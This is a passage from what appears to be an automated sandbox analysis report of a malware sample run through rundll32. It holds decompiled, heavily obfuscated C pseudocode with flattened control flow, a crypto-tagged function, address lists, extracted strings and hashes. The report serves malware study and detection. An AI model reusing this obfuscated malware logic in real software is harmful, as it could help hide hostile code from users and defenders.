				_v92 = _v92 / _t314;
				_v92 = _v92 ^ 0x00007be4;
				_v192 = 0x56f;
				_v192 = _v192 | 0xbe63f676;
				_v192 = _v192 + 0xffff5295;
				_t315 = 0x50;
				_v192 = _v192 / _t315;
				_v192 = _v192 ^ 0x026118ba;
				_v156 = 0x6b88;
				_v156 = _v156 ^ 0x09655f93;
				_v156 = _v156 | 0x7b8c986c;
				_v156 = _v156 ^ 0x7bed91c8;
				_v164 = 0x577a;
				_v164 = _v164 | 0x244a900b;
				_t316 = 0x5a;
				_v164 = _v164 / _t316;
				_v164 = _v164 + 0x9fa4;
				_v164 = _v164 ^ 0x0067dbdf;
				_v136 = 0xa98d;
				_v136 = _v136 | 0x711af761;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0xb7daee67;
				_v144 = 0x63df;
				_v144 = _v144 / _t356;
				_v144 = _v144 * 0x57;
				_v144 = _v144 ^ 0x0000bd33;
				_v100 = 0x4120;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x00024174;
				_v120 = 0xe31b;
				_v120 = _v120 << 0xc;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00389bee;
				_v128 = 0x8413;
				_v128 = _v128 | 0xa7dc13b4;
				_v128 = _v128 + 0x7a44;
				_v128 = _v128 ^ 0xa7dd15d2;
				while(_t319 != 0xc3c7878) {
					if(_t319 == 0x13e32aa5) {
						_push(_v148);
						_push(_v132);
						_push( &_v68);
						_push(_v176);
						_t355 = 0x44;
						E0029614B(_t355, _v140);
						_push(_v184);
						_v68 = _t355;
						_push(_v168);
						_t321 = _v88;
						_v60 = E00296ABA(_v88, 0x2af870, __eflags);
						_t354 = E002922E8(_v108, _v112, _v96, _a20, _v84, _a4,  &_v68, 0, _v88, _t321, _t353, _v180, _v188, _v92, _v160 | _v104, _t321, _v192, _v156);
						E0029F935(_v164, _v60, _v136, _v144);
						_t359 =  &(_t359[0x19]);
						_t319 = 0x29a7a7af;
						continue;
					} else {
						if(_t319 == 0x29a7a7af) {
							E0029DE26(_v100, _v120, _v128, _v84);
						} else {
							if(_t319 != 0x29f69dbc) {
								L9:
								__eflags = _t319 - 0x216615a4;
								if(_t319 != 0x216615a4) {
									continue;
								} else {
								}
							} else {
								_push(_t319);
								_t309 = E002981C9( &_v84, _v116, _v124, _a20, _v152);
								_t359 =  &(_t359[4]);
								if(_t309 != 0) {
									_t319 = 0x13e32aa5;
									continue;
								}
							}
						}
					}
					return _t354;
				}
				_t319 = 0x29f69dbc;
				goto L9;
			}

0x0029e930
0x0029e932
0x0029e933
0x0029e93a
0x0029e941
0x0029e942
0x0029e949
0x0029e950
0x0029e957
0x0029e958
0x0029e959
0x0029e95e
0x0029e965
0x0029e968
0x0029e96c
0x0029e96e
0x0029e97b
0x0029e986
0x0029e98b
0x0029e993
0x0029e998
0x0029e9a0
0x0029e9ae
0x0029e9b3
0x0029e9bd
0x0029e9c2
0x0029e9c8
0x0029e9cd
0x0029e9d5
0x0029e9dd
0x0029e9e5
0x0029e9ed
0x0029e9fa
0x0029e9fd
0x0029ea01
0x0029ea09
0x0029ea19
0x0029ea1d
0x0029ea22
0x0029ea2a
0x0029ea32
0x0029ea3a
0x0029ea42
0x0029ea4a
0x0029ea52
0x0029ea5a
0x0029ea62
0x0029ea6a
0x0029ea72
0x0029ea7e
0x0029ea81
0x0029ea85
0x0029ea8d
0x0029ea95
0x0029ea9d
0x0029eaa2
0x0029eaaa
0x0029eab2
0x0029eabf
0x0029eac5
0x0029eacd
0x0029ead5
0x0029eadd
0x0029eaec
0x0029eaef
0x0029eaf0
0x0029eaf4
0x0029eafc
0x0029eb04
0x0029eb09
0x0029eb0e
0x0029eb16
0x0029eb1e
0x0029eb26
0x0029eb2e
0x0029eb36
0x0029eb3e
0x0029eb46
0x0029eb4e
0x0029eb56
0x0029eb5e
0x0029eb66
0x0029eb6e
0x0029eb76
0x0029eb85
0x0029eb89
0x0029eb91
0x0029eb99
0x0029eb9e
0x0029eba3
0x0029ebab
0x0029ebb3
0x0029ebbb
0x0029ebcb
0x0029ebcf
0x0029ebd4
0x0029ebdc
0x0029ebec
0x0029ebf0
0x0029ebf8
0x0029ec00
0x0029ec08
0x0029ec14
0x0029ec19
0x0029ec1f
0x0029ec27
0x0029ec2f
0x0029ec37
0x0029ec3f
0x0029ec47
0x0029ec4f
0x0029ec5b
0x0029ec5e
0x0029ec62
0x0029ec6a
0x0029ec72
0x0029ec7a
0x0029ec87
0x0029ec8b
0x0029ec93
0x0029ecad
0x0029ecb6
0x0029ecba
0x0029ecc2
0x0029ecca
0x0029eccf
0x0029ecd7
0x0029ecdf
0x0029ece4
0x0029ece9
0x0029ecf1
0x0029ecf9
0x0029ed01
0x0029ed09
0x0029ed11
0x0029ed1f
0x0029ed64
0x0029ed6f
0x0029ed73
0x0029ed74
0x0029ed7e
0x0029ed81
0x0029ed86
0x0029ed8f
0x0029ed96
0x0029ed9a
0x0029eda9
0x0029ee18
0x0029ee2c
0x0029ee31
0x0029ee34
0x00000000
0x0029ed21
0x0029ed27
0x0029ee5e
0x0029ed2d
0x0029ed2f
0x0029ee40
0x0029ee40
0x0029ee46
0x00000000
0x00000000
0x0029ee4c
0x0029ed35
0x0029ed35
0x0029ed50
0x0029ed55
0x0029ed5a
0x0029ed60
0x00000000
0x0029ed60
0x0029ed5a
0x0029ed2f
0x0029ed27
0x0029ee71
0x0029ee71
0x0029ee3e
0x00000000

Strings

Dz, xrefs: 0029ED01
a, xrefs: 0029E9C8
nLI3, xrefs: 0029EBA3
A, xrefs: 0029ECC2
ag, xrefs: 0029EAD5
e}, xrefs: 0029EA42
jB, xrefs: 0029EB76
{, xrefs: 0029EBF0
CE, xrefs: 0029EB66
zW, xrefs: 0029EC47
I, xrefs: 0029E9E5

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A$ I$CE$Dz$a$ag$e}$jB$nLI3$zW${
API String ID: 0-1660822030
Opcode ID: 0f93dff4f6d4c873b51ab13ddb4632c0e9fbca833608c86d155a6dd38b893891
Instruction ID: d017753290c851f4340d83bea245464bc990d21c64b0deedb99f3fef90ec177f
Opcode Fuzzy Hash: 0f93dff4f6d4c873b51ab13ddb4632c0e9fbca833608c86d155a6dd38b893891
Instruction Fuzzy Hash: 77D101715083809FE764CF21C88AA5BFBF2BBC5748F60891DF29996260D3B68955CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00294828, Relevance: 14.0, Strings: 11, Instructions: 267
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00294828() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				unsigned int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				void* _t285;
				intOrPtr _t291;
				short* _t293;
				void* _t305;
				intOrPtr _t307;
				signed int _t315;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int* _t353;

				_t353 =  &_v1160;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t305 = 0x2fa583de;
				_v1052 = 0x4c6f5d;
				_v1080 = 0xd680;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x000048bc;
				_v1160 = 0x84c6;
				_v1160 = _v1160 | 0x90eaef07;
				_v1160 = _v1160 * 0x61;
				_v1160 = _v1160 << 3;
				_v1160 = _v1160 ^ 0x4826b524;
				_v1056 = 0xc964;
				_t342 = 7;
				_v1056 = _v1056 / _t342;
				_v1056 = _v1056 ^ 0x00007207;
				_v1148 = 0x6aa5;
				_t343 = 0x42;
				_v1148 = _v1148 / _t343;
				_t344 = 0x39;
				_v1148 = _v1148 * 5;
				_v1148 = _v1148 / _t344;
				_v1148 = _v1148 ^ 0x00004be4;
				_v1156 = 0x8b63;
				_v1156 = _v1156 ^ 0xf94e8c04;
				_v1156 = _v1156 + 0xb2a1;
				_t345 = 0x43;
				_v1156 = _v1156 / _t345;
				_v1156 = _v1156 ^ 0x03b8f6e0;
				_v1072 = 0x3b6c;
				_v1072 = _v1072 << 0xd;
				_v1072 = _v1072 ^ 0x076db108;
				_v1104 = 0xc3a0;
				_v1104 = _v1104 << 9;
				_v1104 = _v1104 + 0xffff2888;
				_v1104 = _v1104 ^ 0x01862409;
				_v1112 = 0xaed9;
				_v1112 = _v1112 >> 0x10;
				_v1112 = _v1112 << 0xe;
				_v1112 = _v1112 ^ 0x00000f0a;
				_v1128 = 0xabfc;
				_v1128 = _v1128 ^ 0x77a0f64e;
				_v1128 = _v1128 ^ 0x112f7c48;
				_v1128 = _v1128 ^ 0x668f1451;
				_v1064 = 0x4ad0;
				_v1064 = _v1064 >> 0xf;
				_v1064 = _v1064 ^ 0x00005776;
				_v1060 = 0x5f20;
				_v1060 = _v1060 * 0x48;
				_v1060 = _v1060 ^ 0x001aff44;
				_v1140 = 0x22e9;
				_v1140 = _v1140 | 0xed7bddfb;
				_v1140 = _v1140 >> 0x10;
				_v1140 = _v1140 ^ 0x0000a44c;
				_v1092 = 0xed0e;
				_v1092 = _v1092 >> 5;
				_t346 = 0x5c;
				_v1092 = _v1092 / _t346;
				_v1092 = _v1092 ^ 0x000018a1;
				_v1084 = 0x5c62;
				_v1084 = _v1084 ^ 0xaf876960;
				_v1084 = _v1084 ^ 0xaf8726c8;
				_v1120 = 0xa6b7;
				_v1120 = _v1120 + 0xffff8087;
				_v1120 = _v1120 + 0xffff766a;
				_v1120 = _v1120 ^ 0xffff8dde;
				_v1100 = 0x2977;
				_v1100 = _v1100 | 0xa9a2f948;
				_v1100 = _v1100 << 0xd;
				_v1100 = _v1100 ^ 0x5f2fb900;
				_v1116 = 0x7357;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 + 0x6bcf;
				_v1116 = _v1116 ^ 0x0735f991;
				_v1152 = 0xa9ed;
				_t347 = 0x6b;
				_v1152 = _v1152 / _t347;
				_v1152 = _v1152 + 0xffffb059;
				_v1152 = _v1152 | 0xa1b7dbd9;
				_v1152 = _v1152 ^ 0xffffb8a8;
				_v1144 = 0x5a0d;
				_t348 = 0x7b;
				_v1144 = _v1144 / _t348;
				_t349 = 0x2e;
				_v1144 = _v1144 * 3;
				_v1144 = _v1144 / _t349;
				_v1144 = _v1144 ^ 0x00004b37;
				_v1124 = 0x61f5;
				_v1124 = _v1124 + 0xffffcaee;
				_t350 = 0x53;
				_v1124 = _v1124 * 0x74;
				_v1124 = _v1124 ^ 0x00146ed3;
				_v1108 = 0x6a03;
				_v1108 = _v1108 ^ 0xf28a1003;
				_v1108 = _v1108 + 0xe6b2;
				_v1108 = _v1108 ^ 0xf28b78cf;
				_v1136 = 0xc6e0;
				_v1136 = _v1136 ^ 0xb548e6e2;
				_v1136 = _v1136 / _t350;
				_v1136 = _v1136 + 0x2437;
				_v1136 = _v1136 ^ 0x022f5ba0;
				_v1132 = 0xc215;
				_v1132 = _v1132 + 0x3648;
				_v1132 = _v1132 ^ 0x395806f5;
				_v1132 = _v1132 + 0xffff2e7e;
				_v1132 = _v1132 ^ 0x39586c8a;
				_v1096 = 0x96d1;
				_v1096 = _v1096 | 0xdf771839;
				_v1096 = _v1096 + 0x87a2;
				_v1096 = _v1096 ^ 0xdf78572f;
				_v1076 = 0xe1cc;
				_v1076 = _v1076 | 0xe0a4b35b;
				_v1076 = _v1076 ^ 0xe0a4d0d1;
				_v1088 = 0xf12a;
				_v1088 = _v1088 ^ 0x547c61b2;
				_v1088 = _v1088 | 0x30c978fa;
				_v1088 = _v1088 ^ 0x74fdde11;
				_v1068 = 0xde6c;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00037865;
				do {
					while(_t305 != 0x42239bc) {
						if(_t305 == 0x127033fd) {
							_push(_v1156);
							_push(_v1148);
							_t285 = E00296ABA(_v1056, 0x2af800, __eflags);
							_t307 =  *0x2b0724; // 0x340cf0
							E0029F882(__eflags, _t285, _v1072, _v1104, _v1112, _v1128, _t307 + 0x238,  &_v520);
							E0029F935(_v1064, _t285, _v1060, _v1140);
							_t353 =  &(_t353[0xb]);
							_t305 = 0x39c7aaf2;
							continue;
						}
						if(_t305 == 0x2d6c3e18) {
							E0029B3A2();
							_t305 = 0x127033fd;
							continue;
						}
						if(_t305 == 0x2fa583de) {
							_t291 =  *0x2b0724; // 0x340cf0
							__eflags =  *((intOrPtr*)(_t291 + 0x218));
							_t305 =  !=  ? 0x42239bc : 0x2d6c3e18;
							continue;
						}
						if(_t305 == 0x322c5ea9) {
							_t293 = E002A2089(_v1132, _v1096, _v1076,  &_v520);
							__eflags = 0;
							 *_t293 = 0;
							return E002958F0(_v1088,  &_v520);
						}
						_t361 = _t305 - 0x39c7aaf2;
						if(_t305 != 0x39c7aaf2) {
							goto L12;
						}
						_push(_t305);
						_t315 = _v1092;
						E00292F1A(_t315,  &_v1040, _v1084, _v1120);
						_push(_t315);
						E002A9A31(_t315,  &_v1040,  &_v1040);
						_t291 = E002A533C( &_v520, _v1124, _t361, _v1108, _v1136,  &_v1040);
						_t353 =  &(_t353[9]);
						_t305 = 0x322c5ea9;
					}
					E002A5748();
					_t305 = 0x127033fd;
					L12:
					__eflags = _t305 - 0xf4f8fd8;
				} while (__eflags != 0);
				return _t291;
			}

0x00294828
0x0029482e
0x00294835
0x0029483a
0x0029483f
0x00294847
0x0029484f
0x00294854
0x0029485c
0x00294863
0x00294872
0x00294876
0x0029487b
0x00294883
0x00294891
0x00294896
0x0029489c
0x002948a4
0x002948b0
0x002948b5
0x002948c0
0x002948c3
0x002948cf
0x002948d3
0x002948db
0x002948e3
0x002948eb
0x002948f7
0x002948fa
0x002948fe
0x00294906
0x0029490e
0x00294913
0x0029491b
0x00294923
0x00294928
0x00294930
0x00294938
0x00294940
0x00294945
0x0029494a
0x00294952
0x0029495a
0x00294962
0x0029496a
0x00294972
0x0029497a
0x0029497f
0x00294987
0x00294994
0x00294998
0x002949a0
0x002949a8
0x002949b0
0x002949b5
0x002949bd
0x002949c5
0x002949d2
0x002949d7
0x002949dd
0x002949e5
0x002949ed
0x002949f5
0x002949fd
0x00294a05
0x00294a0d
0x00294a15
0x00294a1d
0x00294a25
0x00294a2d
0x00294a32
0x00294a3a
0x00294a42
0x00294a47
0x00294a4f
0x00294a57
0x00294a63
0x00294a68
0x00294a6e
0x00294a76
0x00294a7e
0x00294a86
0x00294a92
0x00294a97
0x00294aa2
0x00294aa5
0x00294ab1
0x00294ab5
0x00294abd
0x00294ac5
0x00294ad2
0x00294ad3
0x00294ad7
0x00294adf
0x00294ae7
0x00294aef
0x00294af7
0x00294aff
0x00294b07
0x00294b15
0x00294b19
0x00294b21
0x00294b29
0x00294b31
0x00294b39
0x00294b41
0x00294b49
0x00294b51
0x00294b59
0x00294b61
0x00294b69
0x00294b71
0x00294b79
0x00294b81
0x00294b89
0x00294b91
0x00294b99
0x00294ba1
0x00294ba9
0x00294bb6
0x00294bc0
0x00294bcd
0x00294bcd
0x00294bd7
0x00294c90
0x00294c99
0x00294ca4
0x00294ca9
0x00294cda
0x00294cf3
0x00294cf8
0x00294cfb
0x00000000
0x00294cfb
0x00294bdf
0x00294c84
0x00294c89
0x00000000
0x00294c89
0x00294beb
0x00294c6a
0x00294c71
0x00294c78
0x00000000
0x00294c78
0x00294bf3
0x00294d32
0x00294d3b
0x00294d3d
0x00000000
0x00294d51
0x00294bf9
0x00294bff
0x00000000
0x00000000
0x00294c05
0x00294c15
0x00294c19
0x00294c2e
0x00294c38
0x00294c58
0x00294c5d
0x00294c60
0x00294c60
0x00294d09
0x00294d0e
0x00294d10
0x00294d10
0x00294d10
0x00000000

Strings

Ws, xrefs: 00294A3A
w), xrefs: 00294A1D
b\, xrefs: 002949E5
]oL, xrefs: 0029483F
7$, xrefs: 00294B19
_, xrefs: 00294987
K, xrefs: 002948D3
7K, xrefs: 00294AB5
H6, xrefs: 00294B31
vW, xrefs: 0029497F
l;, xrefs: 00294906

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: _$7$$7K$H6$Ws$]oL$b\$l;$vW$w)$K
API String ID: 0-328025847
Opcode ID: dc84764a28a1bf8e5e77c6d1875ff88482e3a5b432410c47c760372ce07b50f9
Instruction ID: 7e1bbbc6942fb2a4e92046e886c093239de2534ddaf6728fb2238a9af835d8b6
Opcode Fuzzy Hash: dc84764a28a1bf8e5e77c6d1875ff88482e3a5b432410c47c760372ce07b50f9
Instruction Fuzzy Hash: F5D140715183808FE768CF21C58991BFBE1FBC8758F108A1DF196962A0C7B98A59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00297AE4, Relevance: 11.5, Strings: 9, Instructions: 286
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00297AE4(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int* _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t240;
				intOrPtr _t257;
				void* _t258;
				intOrPtr _t260;
				intOrPtr _t263;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr* _t278;
				void* _t280;
				signed int _t283;
				intOrPtr _t305;
				intOrPtr* _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				signed int* _t314;
				void* _t317;

				_t278 = _a16;
				_push(_t278);
				_push(_a12);
				_t306 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t240);
				_v12 = 0x204fcd;
				_t305 = 0;
				_v8 = 0x4ddb6;
				_t314 =  &(( &_v124)[6]);
				_v4 = 0;
				_v100 = 0xb60d;
				_t280 = 0x23ed989b;
				_v100 = _v100 | 0x2f981f86;
				_v100 = _v100 + 0x719e;
				_v100 = _v100 + 0xffff31d1;
				_v100 = _v100 ^ 0x2f984437;
				_v80 = 0xef77;
				_v80 = _v80 + 0xffff5173;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000033f7;
				_v104 = 0x4377;
				_v104 = _v104 | 0x25119fc7;
				_t307 = 0x76;
				_v104 = _v104 / _t307;
				_v104 = _v104 + 0xa124;
				_v104 = _v104 ^ 0x005127d0;
				_v84 = 0x255b;
				_v84 = _v84 ^ 0x83eabf17;
				_v84 = _v84 + 0xffff710d;
				_v84 = _v84 ^ 0x83ea3b69;
				_v24 = 0x8e61;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x000142b1;
				_v28 = 0xd02c;
				_t308 = 0x6d;
				_v28 = _v28 * 0xc;
				_v28 = _v28 ^ 0x000989e6;
				_v108 = 0x9291;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 | 0xaa78c0ed;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0xa9e36c15;
				_v40 = 0x1d9c;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x00002e10;
				_v92 = 0x6d56;
				_v92 = _v92 + 0xffff48f9;
				_v92 = _v92 / _t308;
				_v92 = _v92 ^ 0x02590f99;
				_v112 = 0x8cc7;
				_v112 = _v112 >> 5;
				_v112 = _v112 >> 6;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x00002307;
				_v120 = 0x25d;
				_v120 = _v120 ^ 0xde3e2837;
				_v120 = _v120 << 1;
				_v120 = _v120 * 0x6d;
				_v120 = _v120 ^ 0x40f04d83;
				_v124 = 0x1346;
				_v124 = _v124 | 0x8bdbfbed;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 + 0x9594;
				_v124 = _v124 ^ 0xefa4299e;
				_v64 = 0x50cb;
				_t309 = 0x4b;
				_v64 = _v64 * 0x70;
				_v64 = _v64 + 0xffff75a4;
				_v64 = _v64 ^ 0x0022e5e6;
				_v68 = 0xa44b;
				_v68 = _v68 << 0xa;
				_v68 = _v68 | 0x24395b4f;
				_v68 = _v68 ^ 0x26b96dac;
				_v72 = 0x10f6;
				_v72 = _v72 | 0x7400ac30;
				_v72 = _v72 ^ 0x9c95e387;
				_v72 = _v72 ^ 0xe8956ee0;
				_v76 = 0x2044;
				_t128 =  &_v76; // 0x2044
				_v76 =  *_t128 / _t309;
				_v76 = _v76 ^ 0xd90ce65f;
				_v76 = _v76 ^ 0xd90c83fa;
				_v32 = 0x9da5;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x000210ff;
				_v96 = 0x5549;
				_t310 = 0x69;
				_v96 = _v96 * 0x1c;
				_v96 = _v96 << 9;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x254fd504;
				_v116 = 0xbb3d;
				_v116 = _v116 ^ 0x96480b4a;
				_v116 = _v116 + 0x485d;
				_v116 = _v116 + 0x3437;
				_v116 = _v116 ^ 0x964901b8;
				_v44 = 0xfe77;
				_v44 = _v44 << 0xf;
				_v44 = _v44 ^ 0x7f3b887b;
				_v48 = 0xc7ca;
				_v48 = _v48 + 0xc6b7;
				_v48 = _v48 ^ 0x0001ab71;
				_v52 = 0xfb6a;
				_t311 = _v16;
				_v52 = _v52 / _t310;
				_v52 = _v52 ^ 0x0000404e;
				_v56 = 0x165c;
				_v56 = _v56 | 0x15d5c492;
				_v56 = _v56 ^ 0x15d5f293;
				_v36 = 0x8326;
				_v36 = _v36 + 0x3feb;
				_v36 = _v36 ^ 0x0000ec2c;
				_v88 = 0x112f;
				_v88 = _v88 + 0xb78;
				_v88 = _v88 ^ 0x019c9473;
				_v88 = _v88 ^ 0x019cb80e;
				while(1) {
					_t255 = _v60;
					while(1) {
						L2:
						_t317 = _t280 - 0x23ed989b;
						if(_t317 > 0) {
							break;
						}
						if(_t317 == 0) {
							_t280 = 0x7106a5f;
							continue;
						}
						if(_t280 == 0x31e7839) {
							_t260 =  *0x2af9d0; // 0x0
							_t283 =  &_v20;
							E00299563(_t283, _t280,  *((intOrPtr*)(_t260 + 8)), _v108, _v40, _v92, _v112);
							_t314 =  &(_t314[6]);
							asm("sbb ecx, ecx");
							_t280 = (_t283 & 0x01628cce) + 0x14c82368;
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						if(_t280 == 0x7106a5f) {
							if( *((intOrPtr*)(_t278 + 4)) < 0x74) {
								L30:
								return _t305;
							}
							_t280 = 0x3064cab0;
							continue;
						}
						if(_t280 == 0xc3de740) {
							_t263 =  *0x2af9d0; // 0x0
							E002A1C79(_v20, _v116, _v44, _v48, _v52, _v16, _v56,  *((intOrPtr*)(_t263 + 0x30)));
							_t314 = _t314 - 0xc + 0x24;
							_t305 =  !=  ? 1 : _t305;
							_t280 = 0x3a9b4c52;
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						if(_t280 == 0x14c82368) {
							if(_t305 == 0) {
								E0029EF80(_v24,  *_t306, _v28);
							}
							goto L30;
						}
						if(_t280 != 0x162ab036) {
							L26:
							if(_t280 == 0x13b75261) {
								goto L30;
							}
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						E0029689F(_v120, _t255, _t311,  *_t306, _v124);
						_t314 =  &(_t314[3]);
						_t280 = 0x2c6fc1fa;
						while(1) {
							_t255 = _v60;
							goto L2;
						}
					}
					if(_t280 == 0x2c6fc1fa) {
						_push(_t280);
						_t257 =  *0x2af9d0; // 0x0
						_t258 = E002A878E(_v20,  *_t306,  *((intOrPtr*)(_t257 + 4)), _v64, _v68, _v72, _v76, _v32, _v96, _t280, _t306 + 4);
						_t314 =  &(_t314[0xa]);
						if(_t258 == 0) {
							_t280 = 0x3a9b4c52;
							goto L26;
						}
						_t280 = 0xc3de740;
						while(1) {
							_t255 = _v60;
							goto L2;
						}
					}
					if(_t280 == 0x3064cab0) {
						_t280 = 0x34f18512;
						goto L2;
					}
					if(_t280 == 0x34f18512) {
						 *((intOrPtr*)(_t306 + 4)) =  *((intOrPtr*)(_t278 + 4)) - 0x74;
						_push(_t280);
						_push(_t280);
						_t273 = E002A9E2B( *((intOrPtr*)(_t306 + 4)));
						_t314 =  &(_t314[3]);
						 *_t306 = _t273;
						if(_t273 == 0) {
							goto L30;
						}
						_t274 =  *_t278;
						_t280 = 0x31e7839;
						_v16 = _t274;
						_t255 = _t274 + 0x74;
						_v60 = _t274 + 0x74;
						_t311 =  &_v116;
						goto L2;
					}
					if(_t280 != 0x3a9b4c52) {
						goto L26;
					}
					_push(_t280);
					E002975B4(_v20);
					_t280 = 0x14c82368;
				}
			}

0x00297ae8
0x00297af2
0x00297af3
0x00297afa
0x00297afc
0x00297b03
0x00297b0a
0x00297b0b
0x00297b0c
0x00297b11
0x00297b1c
0x00297b1e
0x00297b29
0x00297b2c
0x00297b35
0x00297b3d
0x00297b42
0x00297b4a
0x00297b52
0x00297b5a
0x00297b62
0x00297b6a
0x00297b72
0x00297b77
0x00297b7f
0x00297b87
0x00297b95
0x00297b9a
0x00297ba0
0x00297ba8
0x00297bb0
0x00297bb8
0x00297bc0
0x00297bc8
0x00297bd0
0x00297bd8
0x00297bdc
0x00297be4
0x00297bf1
0x00297bf2
0x00297bf6
0x00297bfe
0x00297c06
0x00297c0b
0x00297c13
0x00297c18
0x00297c20
0x00297c28
0x00297c2d
0x00297c35
0x00297c3d
0x00297c4b
0x00297c4f
0x00297c57
0x00297c5f
0x00297c64
0x00297c69
0x00297c6e
0x00297c76
0x00297c7e
0x00297c86
0x00297c8f
0x00297c93
0x00297c9b
0x00297ca3
0x00297cb0
0x00297cb4
0x00297cbe
0x00297cc6
0x00297cd5
0x00297cd8
0x00297cdc
0x00297ce4
0x00297cec
0x00297cf4
0x00297cf9
0x00297d01
0x00297d09
0x00297d11
0x00297d19
0x00297d21
0x00297d29
0x00297d31
0x00297d39
0x00297d3d
0x00297d45
0x00297d4d
0x00297d55
0x00297d5a
0x00297d62
0x00297d6f
0x00297d70
0x00297d74
0x00297d79
0x00297d7d
0x00297d85
0x00297d8d
0x00297d95
0x00297d9d
0x00297da5
0x00297dad
0x00297db5
0x00297dba
0x00297dc2
0x00297dca
0x00297dd2
0x00297dda
0x00297de8
0x00297dec
0x00297df0
0x00297df8
0x00297e00
0x00297e08
0x00297e10
0x00297e18
0x00297e20
0x00297e28
0x00297e30
0x00297e38
0x00297e40
0x00297e48
0x00297e48
0x00297e4c
0x00297e4c
0x00297e4c
0x00297e52
0x00000000
0x00000000
0x00297e58
0x00297f4d
0x00000000
0x00297f4d
0x00297e64
0x00297f20
0x00297f29
0x00297f30
0x00297f35
0x00297f3a
0x00297f42
0x00297e48
0x00297e48
0x00000000
0x00297e48
0x00297e48
0x00297e70
0x00297f00
0x0029805e
0x00298067
0x00298067
0x00297f06
0x00000000
0x00297f06
0x00297e7c
0x00297eb2
0x00297ee2
0x00297ee9
0x00297eef
0x00297ef2
0x00297e48
0x00297e48
0x00000000
0x00297e48
0x00297e48
0x00297e84
0x0029804c
0x00298058
0x0029805d
0x00000000
0x0029804c
0x00297e90
0x0029803d
0x00298043
0x00000000
0x00000000
0x00297e48
0x00297e48
0x00000000
0x00297e48
0x00297e48
0x00297ea3
0x00297ea8
0x00297eab
0x00297e48
0x00297e48
0x00000000
0x00297e48
0x00297e48
0x00297f5d
0x00297ff3
0x00298011
0x00298022
0x00298027
0x0029802c
0x00298038
0x00000000
0x00298038
0x0029802e
0x00297e48
0x00297e48
0x00000000
0x00297e48
0x00297e48
0x00297f69
0x00297fe9
0x00000000
0x00297fe9
0x00297f71
0x00297fa2
0x00297fb5
0x00297fb6
0x00297fba
0x00297fbf
0x00297fc2
0x00297fc6
0x00000000
0x00000000
0x00297fcc
0x00297fce
0x00297fd6
0x00297fda
0x00297fdd
0x00297fe1
0x00000000
0x00297fe1
0x00297f79
0x00000000
0x00000000
0x00297f8b
0x00297f8c
0x00297f92
0x00297f92

Strings

74, xrefs: 00297D9D
O[9$, xrefs: 00297CF9
N@, xrefs: 00297DF0
wC, xrefs: 00297B7F
D m, xrefs: 00297D31
,, xrefs: 00297E20
[%, xrefs: 00297BB0
", xrefs: 00297CE4
IU, xrefs: 00297D62

Memory Dump Source

